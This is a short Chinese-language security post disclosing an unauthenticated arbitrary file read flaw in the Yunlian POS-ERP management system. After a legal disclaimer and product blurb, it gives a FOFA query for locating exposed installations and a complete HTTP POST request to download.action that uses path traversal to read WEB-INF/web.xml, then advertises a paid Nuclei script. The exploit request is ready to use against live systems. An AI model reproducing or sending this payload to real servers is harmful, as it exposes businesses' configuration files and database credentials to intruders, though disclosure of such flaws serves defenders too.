云连POS-ERP管理系统 download.action 任意文件读取漏洞

0x01 免责声明

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！！！

云连POS-ERP管理系统作为一种综合的管理软件，旨在为企业提供全面、高效的业务管理解决方案。基于云计算技术，集POS收银与ERP管理功能于一体的综合管理系统。它通过网络对企业的各类信息进行集中、统一和实时的管理，帮助企业实现销售、库存、财务等业务的全面数字化管理。系统具有用户友好的操作界面和简单直观的操作流程，使得用户可以快速上手并熟练使用。同时，系统还提供了多种数据导出方式，方便用户实时导出各类报表、销售数据、库存数据等，极大地提高了工作效率。

云连POS-ERP管理系统 download.action 存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

FOFA:

title="Powered By chaosZ"

POST /admin/file!download.action;admin!login.action HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Content-Type: application/x-www-form-urlencodedConnection: closedownloadFile=../../WEB-INF/web.xml

Nuclei验证脚本已发布知识星球：冷漠安全